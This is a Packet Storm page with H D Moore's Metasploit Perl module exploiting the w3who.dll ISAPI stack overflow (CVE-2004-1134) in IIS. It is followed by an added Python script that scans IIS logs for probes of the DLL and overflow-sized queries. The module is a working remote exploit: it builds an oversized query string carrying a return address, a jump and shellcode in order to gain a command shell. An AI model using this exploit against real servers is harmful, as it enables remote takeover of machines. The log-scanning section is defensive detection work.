iis_w3who_overflow.pm
Posted Jan 12, 2005
Authored by H D Moore | Site metasploit.com

Remote buffer overflow exploit for the w3who.dll in Microsoft Windows 2000. Drops to a command shell.

tags | exploit, remote, overflow, shell
systems | windows
advisories | CVE-2004-1134
SHA-256 | 791c811f7b49febb9fa1bb40a85b1ab1d9f1f2712120f52a797cf5c3770e9942


##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::iis_w3who_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name'     => 'IIS w3who.dll ISAPI Overflow',
    'Version'  => '$Revision: 1.2 $',
    'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>', ],
    'Arch'     => [ 'x86' ],
    'OS'       => [ 'win32', 'win2000', 'winxp' ],
    'Priv'     => 0,
    'UserOpts' => {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 80],
        'URL'   => [1, 'DATA', 'The URL to the DLL', '/scripts/w3who.dll'],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
    },
    'AutoOpts' => { 'EXITFUNC' => 'process' },
    'Payload'  => {
        'Space'    => 632,
        'BadChars' => "\x00+&=%\x0a\x0d\x20",
        'MinNops'  => 128,
    },

    'Description' => Pex::Text::Freeform(qq{
        This module exploits a stack overflow in the w3who.dll ISAPI application.
        This vulnerability was discovered by Nicolas Gregoire and this code has been
        successfully tested against Windows 2000 and Windows XP (SP2). When
        exploiting Windows XP, the payload must call RevertToSelf before it will
        be able to spawn a command shell.
    }),

    'Refs' => [
        ['CVE', '2004-1134'],
        ['URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
    ],
    'DefaultTarget' => 0,
    'Targets' => [
        # [ name, offset of the saved return address, return address ]
        ['Windows 2000 RESKIT DLL', 748, 0x10019f4a], # pop, pop, ret magic
    ],
    'Keys' => ['iis'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

# Check whether the DLL is reachable: a plain GET to the ISAPI returns a page
# that describes the caller's access token.
sub Check {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_path = $self->GetVar('URL');

    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return $self->CheckCode('Connect');
    }

    $s->Send("GET $target_path HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");

    my $r = $s->Recv(-1, 5);

    if ($r =~ /Access Token/)
    {
        $self->PrintLine("[*] Found $target_path ;)");
        return $self->CheckCode('Detected');
    } else {
        $self->PrintLine("The w3who.dll ISAPI does not appear to be installed");
        return $self->CheckCode('Safe');
    }
}


sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_path = $self->GetVar('URL');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    # Build the oversized query string around the target's offset and address.
    my $pattern = Pex::Text::EnglishText(8192);
    my $jmp = "\xe9".(pack('V', -641));

    substr($pattern, $target->[1] - 4, 4, "\x90\x90\xeb\x04");
    substr($pattern, $target->[1], 4, pack('V', $target->[2]));
    substr($pattern, $target->[1] + 4, length($jmp), $jmp);
    substr($pattern, $target->[1] - 4 - length($shellcode), length($shellcode), $shellcode);

    my $request =
        "GET $target_path?$pattern HTTP/1.1\r\n".
        "Host: $target_host:$target_port\r\n\r\n";

    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $self->PrintLine("[*] Sending " . length($request) . " bytes to remote host.");
    $s->Send($request);

    $self->PrintLine("[*] Waiting for a response...");
    my $r = $s->Recv(-1, 5);
    $s->Close();

    return;
}

1;
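The module's Check routine identifies a reachable w3who.dll by the "Access Token" text in its response, and the Exploit routine sends a query string of about 8 KB to the same URL. From the defending side both show up in the IIS web logs: a bare GET to the DLL, and a request to the DLL with a query string far longer than the 748-byte return-address offset the module targets. The following Python script is an added example, not part of the Metasploit module or of this page, that scans IIS W3C extended log lines for those two signals. The log lines, the field layout, the `OVERFLOW_QUERY_LEN` threshold and every name in the script are constructed for this example.

```python
"""Flag w3who.dll requests (CVE-2004-1134) in IIS W3C extended logs.

Added example for this page; not part of the Metasploit module. The field
layout, the sample log lines and the length threshold are assumptions.
"""
from dataclasses import dataclass

# Field order used when a log has no "#Fields:" directive (assumed layout).
DEFAULT_FIELDS = [
    "date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
    "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
]

# The module's target overwrites the saved return address 748 bytes into the
# query string, so any w3who.dll query at or beyond that length is treated as
# an overflow attempt. The threshold itself is an assumption for this example.
OVERFLOW_QUERY_LEN = 748


@dataclass
class Finding:
    severity: str   # "info" (DLL reachable) or "high" (overflow-sized query)
    client: str     # c-ip of the requester
    reason: str


def assess(record):
    """Return a Finding for a w3who.dll request, or None for anything else."""
    stem = record.get("cs-uri-stem", "-").lower()
    if not stem.endswith("/w3who.dll"):
        return None
    query = record.get("cs-uri-query", "-")
    qlen = 0 if query == "-" else len(query)
    if qlen >= OVERFLOW_QUERY_LEN:
        return Finding("high", record.get("c-ip", "-"),
                       f"query string of {qlen} bytes to w3who.dll "
                       f"(>= {OVERFLOW_QUERY_LEN}); likely overflow attempt")
    # A bare GET is what the module's Check routine sends, but any hit matters:
    # w3who.dll is a Resource Kit tool and should not be exposed on a web server.
    return Finding("info", record.get("c-ip", "-"),
                   "w3who.dll is reachable; remove the ISAPI DLL")


def scan(lines):
    """Parse W3C extended log lines and collect findings for w3who.dll traffic."""
    fields = list(DEFAULT_FIELDS)
    findings = []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()   # honour the log's own layout
            continue
        if line.startswith("#") or not line.strip():
            continue                                  # other directives, blanks
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                                  # truncated/malformed line
        finding = assess(dict(zip(fields, parts)))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample: one ordinary request, one probe like the module's Check
# (bare GET), and one request carrying an 8192-byte query like the Exploit.
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status",
    "2005-01-12 10:00:01 10.0.0.5 GET /default.htm - 80 - 10.0.0.20 Mozilla/4.0 200",
    "2005-01-12 10:00:02 10.0.0.5 GET /scripts/w3who.dll - 80 - 10.0.0.20 - 200",
    "2005-01-12 10:00:03 10.0.0.5 GET /scripts/w3who.dll " + "A" * 8192
    + " 80 - 10.0.0.20 - 500",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.client}: {f.reason}")
```

Run it as a script to see the two findings for the constructed sample, or feed `scan()` the lines of a real W3C log file; the `#Fields:` directive in the file overrides the assumed default layout, and lines whose field count does not match are skipped rather than guessed at.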
© 2022 Packet Storm. All rights reserved.